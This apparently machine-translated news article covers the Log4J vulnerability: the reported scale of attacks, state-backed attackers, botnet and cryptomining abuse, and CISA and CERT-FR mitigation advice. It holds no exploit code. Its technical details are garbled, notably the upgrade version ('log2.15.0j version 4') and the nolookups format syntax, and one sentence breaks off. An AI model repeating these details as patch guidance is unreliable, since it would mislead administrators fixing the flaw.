Recently we commented on the failure of Log4J and in this publication we would like to share information that the researchers, Ya que claim that hackers, including groups supported by the Chinese state but also by Russia, have launched more than 840.000 attacks against companies around the world since last Friday through this vulnerability.
The cybersecurity group Check Point said the related attacks with the vulnerability they had accelerated in the 72 hours since Friday, and at times their investigators were seeing more than 100 attacks per minute.
The editor also noted great creativity in adapting the attack. Sometimes more than 60 new variations appear in less than 24 hours, introducing new obfuscation or coding techniques.
"Chinese government attackers" are mentioned as being included, according to Charles Carmakal, chief technology officer for cyber company Mandiant.
The Log4J flaw allows attackers to take remote control of computers running Java applications.
Jen easterly, director of the United States Cyber and Infrastructure Security Agency (CISA), said to industry executives that Vulnerability was "one of the most serious I have seen in my entire career, if not the most serious", according to the American media. Hundreds of millions of devices are likely to be affected, he said.
Check Point said that in many cases, hackers take over computers and use them to mine cryptocurrencies or become part of botnets, with vast computer networks that can be used to overwhelm website traffic, send spam, or for others. illegal purposes.
For Kaspersky, most of the attacks come from Russia.
CISA and the UK's National Cyber Security Center have issued alerts urging organizations to make updates related to the Log4J vulnerability, as experts try to assess the consequences.
Amazon, Apple, IBM, Microsoft, and Cisco are among those rushing to roll out solutions, but no serious breaches have been publicly reported until
The vulnerability is the latest to affect corporate networks, after vulnerabilities emerged over the past year in common-use software from Microsoft and computer company SolarWinds. Both vulnerabilities were reportedly initially exploited by state-backed spy groups from China and Russia, respectively.
Mandiant's Carmakal said Chinese state-backed actors are also trying to exploit the Log4J bug, but he declined to share further details. SentinelOne researchers also told the media that they had observed Chinese hackers taking advantage of the vulnerability.
CERT-FR recommends a thorough analysis of the network logs. The following reasons can be used to identify an attempt to exploit this vulnerability when used in URLs or certain HTTP headers as user-agent
It is strongly recommended to use log2.15.0j version 4 as soon as possible. However, in case of difficulties migrating to this version, the following solutions can be temporarily applied:
For applications that use versions 2.7.0 and later of the log4j library, it is possible to protect against any attack by modifying the format of the events that will be logged with the syntax% m {nolookups} for the data that the user would provide.
Almost half of all attacks have been carried out by known cyber attackers, according to Check Point. These included groups that use Tsunami and Mirai, malware that turns devices into botnets, or networks that are used to launch remotely controlled attacks, such as denial of service attacks. It also included groups that use XMRig, software that exploits the Monero digital currency.
"With this vulnerability, attackers gain almost unlimited power: they can extract confidential data, upload files to the server, delete data, install ransomware or switch to other servers," said Nicholas Sciberras, Acunetix chief engineering officer, vulnerability scanner. It was "surprisingly easy" to implement an attack, he said, adding that the flaw would be "exploited in the next few months."